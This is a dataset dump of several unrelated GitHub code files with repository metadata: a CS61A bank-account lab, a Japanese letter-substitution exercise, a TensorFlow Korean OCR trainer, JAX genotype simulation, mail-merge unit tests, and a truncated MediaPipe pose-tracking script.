sys.exit(app.exec_())","repo_name":"thomasNewton/tic_tac","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11941916819","text":"class Account:\n \"\"\"An account has a balance and a holder.\n >>> a = Account('John')\n >>> a.deposit(10)\n 10\n >>> a.balance\n 10\n >>> a.interest\n 0.02\n >>> a.time_to_retire(10.25) # 10 -> 10.2 -> 10.404\n 2\n >>> a.balance # balance should not change\n 10\n >>> a.time_to_retire(11) # 10 -> 10.2 -> ... -> 11.040808032\n 5\n >>> a.time_to_retire(100)\n 117\n \"\"\"\n max_withdrawal = 10\n interest = 0.02\n\n def __init__(self, account_holder):\n self.balance = 0\n self.holder = account_holder\n\n def deposit(self, amount):\n self.balance = self.balance + amount\n return self.balance\n\n def withdraw(self, amount):\n if amount > self.balance:\n return \"Insufficient funds\"\n if amount > self.max_withdrawal:\n return \"Can't withdraw that amount\"\n self.balance = self.balance - amount\n return self.balance\n\n def time_to_retire(self, amount):\n \"\"\"Return the number of years until balance would grow to amount.\"\"\"\n assert self.balance > 0 and amount > 0 and self.interest > 0\n year, curAmount = 0, self.balance\n while True:\n year += 1\n curAmount *= (1 + self.interest)\n if curAmount > amount:\n return year\n\n\nclass FreeChecking(Account):\n \"\"\"A bank account that charges for withdrawals, but the first two are free!\n >>> ch = FreeChecking('Jack')\n >>> ch.balance = 20\n >>> ch.withdraw(100) # First one's free\n 'Insufficient funds'\n >>> ch.withdraw(3) # And the second\n 17\n >>> ch.balance\n 17\n >>> ch.withdraw(3) # Ok, two free withdrawals is enough\n 13\n >>> ch.withdraw(3)\n 9\n >>> ch2 = FreeChecking('John')\n >>> ch2.balance = 10\n >>> ch2.withdraw(3) # No fee\n 7\n >>> ch.withdraw(3) # ch still charges a fee\n 5\n >>> ch.withdraw(5) # Not enough to cover fee + withdraw\n 'Insufficient funds'\n \"\"\"\n withdraw_fee = 1\n free_withdrawals = 2\n\n def withdraw(self, amount):\n if self.free_withdrawals > 0:\n if amount > self.balance:\n self.free_withdrawals -= 1\n return \"Insufficient funds\"\n if amount > self.max_withdrawal:\n self.free_withdrawals -= 1\n return \"Can't withdraw that amount\"\n self.free_withdrawals -= 1\n self.balance = self.balance - amount\n else:\n if amount + self.withdraw_fee > self.balance:\n self.free_withdrawals -= 1\n return \"Insufficient funds\"\n if amount + self.withdraw_fee > self.max_withdrawal:\n self.free_withdrawals -= 1\n return \"Can't withdraw that amount\"\n self.balance = self.balance - amount - self.withdraw_fee\n\n return self.balance\n \n","repo_name":"MartinLwx/CS61A-Fall-2021-UCB","sub_path":"Labs/lab07/lab07.py","file_name":"lab07.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"19684966065","text":"def cipher(sentence):\n\t'''\n\t英小文字ならば(219 - 文字コード)の文字に置換\n\tその他の文字はそのまま出力\n\t参考: https://note.nkmk.me/python-capitalize-lower-upper-title/\n\t参考: https://tanishiking24.hatenablog.com/entry/python-charset\n\n\t引数:文字列\n\t戻り値:変換した文字列\n\t'''\n\n\tresult = \"\"\n\tprint(f'変換前: {sentence}')\n\n\tfor char in sentence:\n\t\tif char.islower():\n\t\t\t#ord()により、ある文字に対応するコードポイント(の10進数表記を得ることができる)\n\t\t\t#chr()により、あるコードポイント(の10進数整数)から対応する文字を得ることができる\n \t\t\tresult = result + chr(219 - ord(char))\n\t\t\t#その他\n\t\telse:\n\t\t\tresult = result + 
char\n\n\treturn result\n\nprint(\"変換後:\", cipher(\"Hikaru_Morita\"))","repo_name":"cdlab-sit/100knock","sub_path":"kumbikumbiSIC/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18241299468","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport dataset\nimport utils.korean_manager as korean_manager\nfrom PIL import Image\nimport random\nimport os\nfrom IPython.display import clear_output\nimport gc\nimport wandb\nimport datetime\nimport shutil\nfrom tqdm import tqdm\nfrom keras_adabound import AdaBound\nimport utils.predict_char as predict_char\nfrom utils.model_architectures import VGG16,InceptionResnetV2,MobilenetV3,EfficientCNN,AFL_Model\nfrom utils.MelnykNet import melnyk_net\nclass KoOCR():\n def __init__(self,split_components=True,weight_path='',fc_link='',network_type='melnyk',image_size=96,direct_map=False,refinement_t=4,\\\n iterative_refinement=False,data_augmentation=False,adversarial_learning=False):\n self.split_components=split_components\n self.iterative_refinement=iterative_refinement\n self.refinement_t=refinement_t\n self.charset=korean_manager.load_charset()\n self.adversarial_learning=adversarial_learning\n #Build and load model\n if weight_path:\n self.model = tf.keras.models.load_model(weight_path,compile=False)\n else:\n model_list={'VGG16':VGG16,'inception-resnet':InceptionResnetV2,'mobilenet':MobilenetV3,'efficient-net':EfficientCNN,'melnyk':melnyk_net,\n 'afl':AFL_Model}\n settings={'split_components':split_components,'input_shape':image_size,'direct_map':direct_map,'fc_link':fc_link,'refinement_t':refinement_t,\\\n 'iterative_refinement':iterative_refinement,'data_augmentation':data_augmentation,'adversarial_learning':adversarial_learning}\n self.model=model_list[network_type](settings)\n if iterative_refinement:\n self.decoders=self.find_decoders()\n \n def find_decoders(self):\n return 0\n \n def predict(self,image,n=1):\n if self.split_components:\n return predict_char.predict_split(self.model,image,n)\n else:\n return predict_char.predict_complete(self.model,image,n)\n \n def plot_val_image(self,val_data):\n #Load validation data\n val_x,val_y=val_data\n #Predict classes\n indicies=random.sample(range(len(val_x)),10)\n val_x=val_x[indicies]\n pred_y=self.predict(val_x,10)\n\n fig = plt.figure(figsize=(10,1))\n for idx in range(10):\n plt.subplot(1,10,idx+1)\n plt.imshow(val_x[idx],cmap='gray')\n plt.axis('off')\n plt.savefig('./logs/image.png')\n print(pred_y)\n\n def compile_adversarial_model(self,lr,opt,adversarial_ratio=0):\n #build adversarial model for training\n input_image=self.model.input\n disc_output=self.model.get_layer('DISC')\n\n self.discriminator=tf.keras.models.Model(self.model.input,disc_output.output)\n\n for l in self.model.layers:\n l.trainable=False\n \n self.model.get_layer('disc_start').trainable=True\n self.model.get_layer('DISC').trainable=True\n\n lr=lr*adversarial_ratio*3\n if opt =='sgd':\n optimizer=tf.keras.optimizers.SGD(lr)\n elif opt=='adam':\n optimizer=tf.keras.optimizers.Adam(lr)\n elif opt=='adabound':\n optimizer=AdaBound(lr=lr,final_lr=lr*100)\n\n self.discriminator.compile(optimizer=optimizer,loss='binary_crossentropy')\n\n def compile_model(self,lr,opt,adversarial_ratio=0):\n def inverse_bce(y_true,y_pred):\n y_true=y_true*-1+1\n return tf.keras.losses.binary_crossentropy(y_true,y_pred)\n\n #Compile model \n if opt =='sgd':\n 
optimizer=tf.keras.optimizers.SGD(lr)\n elif opt=='adam':\n optimizer=tf.keras.optimizers.Adam(lr)\n elif opt=='adabound':\n optimizer=AdaBound(lr=lr,final_lr=lr*100)\n \n if self.iterative_refinement:\n losses=\"categorical_crossentropy\"\n elif self.split_components:\n if self.adversarial_learning:\n losses = {\n \"CHOSUNG\": \"categorical_crossentropy\",\n \"JUNGSUNG\": \"categorical_crossentropy\",\n \"JONGSUNG\": \"categorical_crossentropy\",\n 'DISC':inverse_bce}\n if self.fit_discriminator:\n lossWeights = {\"CHOSUNG\": 1.0-adversarial_ratio, \"JUNGSUNG\": 1.0-adversarial_ratio,\n \"JONGSUNG\":1.0-adversarial_ratio,\"DISC\":3*adversarial_ratio}\n else:\n lossWeights = {\"CHOSUNG\": 1.0, \"JUNGSUNG\": 1.0,\"JONGSUNG\":1.0,\"DISC\":0}\n else:\n losses = {\n \"CHOSUNG\": \"categorical_crossentropy\",\n \"JUNGSUNG\": \"categorical_crossentropy\",\n \"JONGSUNG\": \"categorical_crossentropy\"}\n lossWeights = {\"CHOSUNG\": 1.0, \"JUNGSUNG\": 1.0,\"JONGSUNG\":1.0}\n else:\n losses=\"categorical_crossentropy\"\n lossWeights=None\n \n if self.adversarial_learning:\n self.model.trainable=True\n self.model.get_layer('disc_start').trainable=False\n self.model.get_layer('DISC').trainable=False\n \n self.model.compile(optimizer=optimizer, loss=losses,metrics=[\"accuracy\"],loss_weights=lossWeights)\n\n def fit_adversarial(self,train_x,train_y,val_x,val_y,batch_size):\n train_dataset = tf.data.Dataset.from_tensor_slices((train_x, train_y)).batch(batch_size)\n loss_arr,total_p=0,0\n \n if self.verbose==1:\n pbar=tqdm(train_dataset)\n else:\n pbar=train_dataset\n for image,label in pbar:\n out=self.model.train_on_batch(image,label)\n loss_arr+=np.array(out)\n total_p+=1\n \n if self.fit_discriminator:\n self.discriminator.train_on_batch(image,label['DISC'])\n results = self.model.evaluate(val_x, val_y, batch_size=128,verbose=self.verbose)\n print(\"Training L:\", list(loss_arr/total_p))\n\n loss_dict = {name+'_loss': pred for name, pred in zip(self.model.output_names, out[:len(out)//2])}\n acc_dict = {name+'_accuracy': pred for name, pred in zip(self.model.output_names, out[len(out)//2:])}\n z = {**loss_dict, **acc_dict}\n return z\n\n def train(self,epochs=10,lr=0.001,data_path='./data',patch_size=10,batch_size=32,optimizer='adabound',zip_weights=False,\n adversarial_ratio=0.15,log_tensorboard=True,log_wandb=False,setup_wandb=False,fit_discriminator=True,silent_mode=False):\n def write_tensorboard(summary_writer,history,step):\n with summary_writer.as_default():\n if self.split_components:\n tf.summary.scalar('training_loss', history.history['loss'][0], step=step)\n tf.summary.scalar('CHOSUNG_accuracy', history.history['CHOSUNG_accuracy'][0], step=step)\n tf.summary.scalar('JUNGSUNG_accuracy', history.history['JUNGSUNG_accuracy'][0], step=step)\n tf.summary.scalar('JONGSUNG_accuracy', history.history['JONGSUNG_accuracy'][0], step=step)\n\n tf.summary.scalar('val_loss', history.history['val_loss'][0], step=step)\n tf.summary.scalar('val_CHOSUNG_accuracy', history.history['val_CHOSUNG_accuracy'][0], step=step)\n tf.summary.scalar('val_JUNGSUNG_accuracy', history.history['val_JUNGSUNG_accuracy'][0], step=step)\n tf.summary.scalar('val_JONGSUNG_accuracy', history.history['val_JONGSUNG_accuracy'][0], step=step)\n else:\n tf.summary.scalar('training_loss', history.history['loss'][0], step=step)\n tf.summary.scalar('val_loss', history.history['accuracy'][0], step=step)\n tf.summary.scalar('training_accuracy', history.history['val_loss'][0], step=step)\n tf.summary.scalar('val_accuracy', 
history.history['val_accuracy'][0], step=step)\n \n def setup_wandboard():\n wandb.init(project=\"KoOCR\", config={\n 'AFL': self.adversarial_learning,\n 'Iterative Refinement': self.iteratve_refinement,\n \"optiminzer\": optimizer,\n \"batch_size\": batch_size,\n 'learning_rate':lr,\n 'AFL ratio':adversarial_ratio,\n 'Split components':self.split_components\n })\n def write_wandb(history):\n wandb.log(history)\n train_dataset=dataset.DataPickleLoader(split_components=self.split_components,data_path=data_path,patch_size=patch_size,\n return_image_type=self.adversarial_learning,silent_mode=silent_mode)\n val_x,val_y=train_dataset.get_val()\n if self.iterative_refinement:\n val_y=[val_y['CHOSUNG'],val_y['JUNGSUNG'],val_y['JONGSUNG']]*self.refinement_t\n self.fit_discriminator=fit_discriminator\n self.compile_model(lr,optimizer,adversarial_ratio)\n if self.adversarial_learning:\n self.compile_adversarial_model(lr,optimizer,adversarial_ratio)\n\n summary_writer = tf.summary.create_file_writer(\"./logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n if setup_wandb:\n setup_wandboard()\n step=0\n \n if silent_mode:\n self.verbose=2\n else:\n self.verbose=1\n\n for epoch in range(epochs):\n print('Training epoch',epoch)\n self.plot_val_image(val_data=(val_x,val_y))\n epoch_end=False\n while epoch_end==False:\n #Train on loaded dataset batch\n train_x,train_y,epoch_end=train_dataset.get()\n if self.iterative_refinement:\n train_y=[train_y['CHOSUNG'],train_y['JUNGSUNG'],train_y['JONGSUNG']]*self.refinement_t\n\n if self.adversarial_learning:\n history=self.fit_adversarial(train_x,train_y,val_x,val_y,batch_size)\n else:\n history=self.model.fit(x=train_x,y=train_y,epochs=1,validation_data=(val_x,val_y),batch_size=batch_size,verbose=self.verbose)\n #Log losses to Tensorboard\n if log_tensorboard:\n write_tensorboard(summary_writer,history,step)\n if log_wandb:\n write_wandb(history)\n step+=1\n #Clear garbage memory\n tf.keras.backend.clear_session()\n gc.collect()\n \n #Save weights in checkpoint\n self.model.save('./logs/weights', save_format='tf')\n if zip_weights:\n shutil.make_archive('weights_epoch_'+str(epoch), 'zip', './logs/weights')","repo_name":"sieu-n/KoOCR-tensorflow","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10781,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"42688054611","text":"import jax\nimport jax.numpy as jnp\nimport jax.numpy.linalg as jnla\nimport jax.random as rdm\n\nimport pandas_plink as pdp\n\n# naive simulation of genotype with no LD structure\ndef naive_sim_genotype(n_samples: int, p_snps: int, rng_key):\n \"\"\"Simulate genotype with no LD.\n\n Args:\n n_samples: the number of samples to simulate.\n p_snps: the number of SNPs to simulate.\n rng_key: the `jax.random.PRNGKey` to sample data with\n\n Returns:\n `jax.ndarray`: A 0/1/2 genotype matrix of shape `n_samples` by `p_snps`.\n \"\"\"\n key, f_key, h1_key, h2_key = rdm.split(rng_key, 4)\n freq = rdm.uniform(f_key, shape=(p_snps,), minval=0.01, maxval=0.5)\n h1 = rdm.bernoulli(h1_key, freq, shape=(n_samples, p_snps)).astype(float)\n h2 = rdm.bernoulli(h2_key, freq, shape=(n_samples, p_snps)).astype(float)\n\n X = h1 + h2\n\n return X\n\n\ndef sim_geno_from_plink(prefix: str, n_samples: int, rng_key, ld_ridge: float = 0.01):\n \"\"\"Simulate approximate genotypes using real genotype data from a PLINK\n dataset. 
Simulated data will reflect LD patterns in real data, but have\n continous approximations to genotype data under an MVN.\n\n Args:\n prefix: the path to the PLINK triplet.\n n_samples: the number of samples to generate.\n rng_key: the `jax.random.PRNGKey` to sample data with.\n ld_ridge: an offset to ensure that the LD matrix is PSD.\n \"\"\"\n\n # return cholesky L and ldscs\n bim, fam, G = pdp.read_plink(prefix, verbose=False)\n G = jnp.asarray(G.T.compute())\n\n n, p = G.shape\n # estimate LD for population from PLINK data\n G = (G - jnp.mean(G, axis=0)) / jnp.std(G, axis=0)\n\n # regularize so that LD is PSD\n LD = jnp.dot(G.T, G) / n + jnp.eye(p) * ld_ridge\n\n # re-adjust to get proper correlation matrix\n LD = LD / (1 + ld_ridge)\n\n # compute cholesky decomp for faster sampling/simulation\n L = jnla.cholesky(LD)\n\n p, p = L.shape\n\n Z = (L @ rdm.normal(rng_key, shape=(n_samples, p)).T).T\n Z -= jnp.mean(Z, axis=0)\n Z /= jnp.std(Z, axis=0)\n\n return Z\n","repo_name":"USCbiostats/PM570-Colab","sub_path":"sim/geno.py","file_name":"geno.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37462328802","text":"#!/usr/bin/env python\nfrom sys import path\n#from mms.OfficeDocument import *\n#from mms.OfficeDocument.OfficeDocument import OfficeDocument\n#from pyMailMerge import *\n#from OfficeDocument import WriterDocument\npath.append( '..' )\nfrom mms import pyMailMerge\nfrom mms.OfficeDocument import *\nfrom mms.OfficeDocument.WriterDocument import WriterDocument\n\nimport unittest\nimport os\n#define unit tests\nclass testPyMailMerge( unittest.TestCase ):\n xml = r'''\n \n fake::token\n value1\n \n \n fake::array\n firstInspect\n second\n \n \n token::fake\n value2\n \n '''\n def setUp(self):\n pass\n def test_sortParams(self):\n x = pyMailMerge._sortParams( [\n { 'token':'fake::token','value':'value' }, \n { 'token':'html|fake::withhtml','value':'
<p>
    whatever
</p>
    ' }, \n { 'token':'repeatrow|fake::repeatingrow','value':['row1','row2'] }, \n { 'token':'fake::tokens','value':['1','2'] }, \n { 'token':'if|fake::ifstatement', 'value':'1' } \n ] )\n self.assertEquals( 'if|fake::ifstatement', x[0]['token'] )\n self.assertEquals( 'repeatrow|fake::repeatingrow', x[1]['token'] )\n self.assertEquals( 'html|fake::withhtml', x[2]['token'] )\n #don't care about the other two tokens as long as the order of the ones with modifiers is correct\n self.assertEquals( 5, len( x ) )\n def test_readParamsFromXML(self):\n x = pyMailMerge._readParamsFromXML( self.xml )\n self.assertEquals( 'fake::token', x[0]['token'] )\n self.assertEquals( 'value1', x[0]['value'] )\n self.assertEquals( 'fake::array', x[1]['token'] )\n self.assertEquals( 'first', x[1]['value'][0] )\n self.assertEquals( 'second', x[1]['value'][1] )\n self.assertEquals( 'token::fake', x[2]['token'] )\n self.assertEquals( 'value2', x[2]['value'] )\n \"\"\"def test_process(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/invoice.odt' ) )\n pmm = pyMailMerge( path )\n x = [\n { 'token':'company::name','value':'Random Company' }, \n { 'token':'company::address1','value':'123 Mystery Lane' }, \n { 'token':'company::city','value':\"Winnipeg\" }, \n { 'token':'company::prov','value':\"MB\" }, \n { 'token':'company::phone', 'value':'123-555-4567' },\n { 'token':\"client::company\", \"value\":\"Client Company\" },\n { 'token':'client::name', 'value':'Random Dude' },\n { 'token':'client::city', 'value':'Brandon' },\n { 'token':'client::prov', 'value':'MB' },\n { 'token':'client::postalcode', 'value':'R3J 2U8' },\n { 'token':'repeatrow|product::desc', 'value':['SKU 123 - Hammer','SKU 223 - Nail'] },\n { 'token':'product::rate', 'value':['6.98','1.99'] },\n { 'token':'product::qty', 'value':[ '1', '10' ] },\n { 'token':'product::total', 'value':['6.98', '19.90' ] },\n { 'token':'if|paid', 'value':'1' },\n { 'token':'if|notpaid', 'value':'0' },\n { 'token':'paid::date', 'value':'Jan 01, 3011' },\n { 'token':'payment::due', 'value':'Feb 01, 3011' },\n { 'token':'paid', 'value':'PAID' },\n { 'token':'html|notes', 'value':'
<p>
    Terms:
</p>
<p>
    1. Payment due in 30 days.
    2. No refunds
</p>
    ' },\n { 'token':'repeatsection|repeater', 'value':'2' }\n ]\n pmm._process( x )\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/invoice.out.odt' ) )\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/invoice.out.pdf' ) )\n \"\"\"\n def test_getTokens(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/invoice.odt' ) )\n pmm = pyMailMerge( path )\n x = pmm.getTokens()\n x.sort()\n self.assertEquals( 0, x.index( '~client::city~' ) ) \n self.assertEquals( 1, x.index( '~client::company~' ) ) \n self.assertEquals( 2, x.index( '~client::name~' ) )\n self.assertEquals( 3, x.index( '~client::postalcode~' ) ) \n self.assertEquals( 4, x.index( '~client::prov~' ) )\n self.assertTrue( '~company::city~' in x )\n self.assertTrue( '~company::phone~' in x )\n self.assertTrue( '~company::prov~' in x )\n self.assertTrue( '~endif|notpaid~' in x )\n self.assertTrue( '~endif|paid~' in x )\n self.assertTrue( '~html|notes~' in x )\n self.assertTrue( '~if|notpaid~' in x )\n self.assertTrue( '~if|paid~' in x )\n self.assertTrue( '~paid::date~' in x )\n self.assertTrue( '~payment::due~' in x )\n self.assertTrue( '~product::qty~' in x )\n self.assertTrue( '~product::rate~' in x )\n self.assertTrue( '~product::total~' in x )\n self.assertTrue( '~repeatrow|product::desc~' in x )\n \"\"\"\n #this odt file is missing... Will have to re-create\n def testRepeatSection(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSection.odt' ) )\n pmm = pyMailMerge( path )\n x = [\n { 'token':'repeatsection|first', 'value':'4' }\n ]\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSection.out.pdf' ) )\n \"\"\"\n \"\"\"\n #this odt file is missing... 
Will have to re-create\n def testRepeatSectionReadOnly(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSection_readonly.odt' ) )\n pmm = pyMailMerge( path )\n x = [\n { 'token':'repeatsection|first', 'value':'4' }\n ]\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSection_readonly.out.pdf' ) )\n \"\"\"\n def testRepeatSectionTable(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSectionTable.odt' ) )\n pmm = pyMailMerge( path )\n x = [\n { 'token':'repeatsection|first', 'value':'4' }\n ]\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/repeatSectionTable.out.pdf' ) )\n '''def testSpreadsheet( self ):\n import datetime\n today = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/spreadsheet.ods' ) )\n pmm = pyMailMerge( path, 'ods' )\n x = [\n { 'token':'repeatrow|invoice', 'value':['1', '2', '3', '4'] },\n { 'token':'total', 'value':['1213.23' ,'531.34', '654.21', '3123.3'] },\n { 'token':'date', 'value':['2011-01-01','2011-01-07','2011-01-03','2011-01-02'] },\n { 'token':'today', 'value':today }\n ]\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( os.path.join( os.path.dirname( __file__ ), 'docs/spreadsheet.out.xls' ) )\n '''\n\n def test_repeatrow_test_for_ted(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/repeatrow_test_for_ted.odt' ) )\n outFile = os.path.join( os.path.dirname( __file__ ), 'docs/repeatrow_test_for_ted.out.odt' )\n pmm = pyMailMerge( path )\n \n f = open( os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'fixtures/repeatrow_test_for_ted.xml' ) ) )\n\n x = pyMailMerge._readParamsFromXML( f.read() )\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( outFile )\n \n tableData = self._getFirstTableData( outFile )\n \n expectedOutcome = [ [ 'Benefit', 'Assurance', 'Financial'], \n [ 'Life Benefit', ' - ', ' - '],\n [ 'Officers', '10000', '10000' ],\n [ 'Owners/Officers/Managers', '10000', '10000' ],\n [ 'Dental Benefit', ' - ', ' - ' ], \n [ 'Employees', '10000', '10000' ], \n [ 'Officers', '10000', '10000' ],\n [ 'Health Benefit', ' - ', ' - ' ],\n [ 'Officers', '10000', '10000' ],\n [ 'LTD Benefit', ' - ', ' - ' ],\n [ 'Officers', '10000', '10000' ],\n [ 'Weekly Income Benefit', ' - ', ' - ' ],\n [ 'Officers', '10000', '10000' ]\n ]\n \n self.assertEquals( expectedOutcome, tableData )\n self.assertEquals( 13, len( tableData ) )\n\n def test_repeatrow_and_repeatcolumn(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/repeat_row_and_column.odt' ) )\n outFile = os.path.join( os.path.dirname( __file__ ), 'docs/repeat_row_and_column.out.odt' )\n pmm = pyMailMerge( path )\n \n f = open( os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'fixtures/repeatrow_and_repeatcolumn.xml' ) ) )\n\n x = pyMailMerge._readParamsFromXML( f.read() )\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( outFile )\n \n tableData = self._getFirstTableData( outFile )\n \n expectedOutcome = [ [ 'Name', 'name', 'life_benefit', 'life', 'add', 'dep_life', \n 'crit_illness', 'eap', 'wi_benefit', 'wi', 'ltd_benefit', 'ltd',\n 'ehb', 'dental', 'total', \"Total\" ],\n [u'Test User', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'Test 
User 2', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'Another User', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ']\n ]\n \n self.assertEquals( expectedOutcome, tableData )\n\n def _getFirstTableData( self, outFile ):\n #open file\n od = WriterDocument()\n od.open( outFile )\n #get table\n tables = od.oodocument.getTextTables()\n strings = od.getTextTableStrings( tables.getByIndex( 0 ) )\n od.close()\n return strings\n \n def test__readNamedRangesFromXML(self):\n #should convert the xml into a list of named ranges\n fixture = f = open( os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'fixtures/namedRanges.xml' ) ) )\n x = pyMailMerge._readNamedRangesFromXML( fixture.read() )\n expected = [ 'first', 'second', 'third', 'all' ]\n self.assertEquals( expected, x )\n \n #if a list of named ranges was passed, the same list should be returned\n x = None\n x = pyMailMerge._readNamedRangesFromXML( expected )\n self.assertEquals( expected, x )\n \n #if a tuple of named ranges was passed, the same tuple should be returned\n expected = ( 'first', 'second', 'third', 'all' )\n x = None\n x = pyMailMerge._readNamedRangesFromXML( expected )\n self.assertEquals( expected, x )\n \n def test_calculatorXML(self):\n fixture = f = open( os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'fixtures/calculator.xml' ) ) )\n params = pyMailMerge._readParamsFromXML( fixture.read() )\n \n self.assertEqual( [ { 'token':'title', 'value':'Calculator' } ], params )\n \n '''def test_calculator(self): \n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/calculator.ods' ) )\n outFile = os.path.join( os.path.dirname( __file__ ), 'docs/calculator.out.ods' )\n pmm = pyMailMerge( path, 'ods' )\n \n f = open( os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'fixtures/calculator.xml' ) ) )\n \n results = pmm.calculator( f.read() )\n \n expected = { 'totals':[ '1514', '1668', '910' ],\n 'test':[ ['a','b'],['c','d'],['e','f'],['g','h'] ],\n 'results':[ '151.4', '333.6', '455' ],\n 'more':[ '124', '548', '464' ]\n }\n \n self.assertEqual( expected, results )\n '''\n def test_deleteRow(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/deleteRow.odt' ) )\n outFile = os.path.join( os.path.dirname( __file__ ), 'docs/deleteRow.out.odt' )\n pmm = pyMailMerge( path ) \n \n xml = \"\"\"\n \n deleterow|wanted\n 0\n \n \n deleterow|unwanted\n 1\n \n \n deleterow|another\n 0\n \n \"\"\"\n \n x = pyMailMerge._readParamsFromXML( xml )\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( outFile )\n \n results = self._getFirstTableData( outFile )\n \n expected = [[ 'Wanted Row', '', \"Send value '0' to keep\" ],\n [ 'Another Wanted', '', \"Send value '0' to keep\"] ]\n \n 
self.assertEqual( expected, results )\n \n def test_deleteColumn(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/deleteColumn.odt' ) )\n outFile = os.path.join( os.path.dirname( __file__ ), 'docs/deleteColumn.out.odt' )\n pmm = pyMailMerge( path ) \n \n xml = \"\"\"\n \n deletecolumn|wanted\n 0\n \n \n deletecolumn|unwanted\n 1\n \n \n deletecolumn|another\n 0\n \n \"\"\"\n \n x = pyMailMerge._readParamsFromXML( xml )\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( outFile )\n \n results = self._getFirstTableData( outFile )\n \n expected = [[ 'First', \"Third\" ],\n [ 'A', 'C' ],\n [ 'D', 'F' ] ]\n \n self.assertEqual( expected, results )\n \nif __name__ == '__main__':\n unittest.main()","repo_name":"bkulyk/pyMailMergeService","sub_path":"tests/testPyMailMerge.py","file_name":"testPyMailMerge.py","file_ext":"py","file_size_in_byte":16055,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"24877830752","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nimport time as time\nmp_drawing = mp.solutions.drawing_utils\nmp_pose = mp.solutions.pose\n\ncap = cv2.VideoCapture(0)\n## Setup mediapipe instance\nwith mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:\n while cap.isOpened():\n ret, frame = cap.read()\n \n # Recolor image to RGB\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False\n \n # Make detection\n results = pose.process(image)\n \n # Recolor back to BGR\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n \n # Render detections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_pose.POSE_CONNECTIONS,\n mp_drawing.DrawingSpec(color=(245,0,0), thickness=2, circle_radius=2), \n mp_drawing.DrawingSpec(color=(0,245,0), thickness=2, circle_radius=2)\n ) \n \n if results.pose_landmarks != None:\n \n counter = 0 \n for i in range(0,11):\n if results.pose_landmarks.landmark[i].x >= 0 and results.pose_landmarks.landmark[i].x <= 1 and results.pose_landmarks.landmark[i].y >= 0 and results.pose_landmarks.landmark[i].y <= 1:\n counter 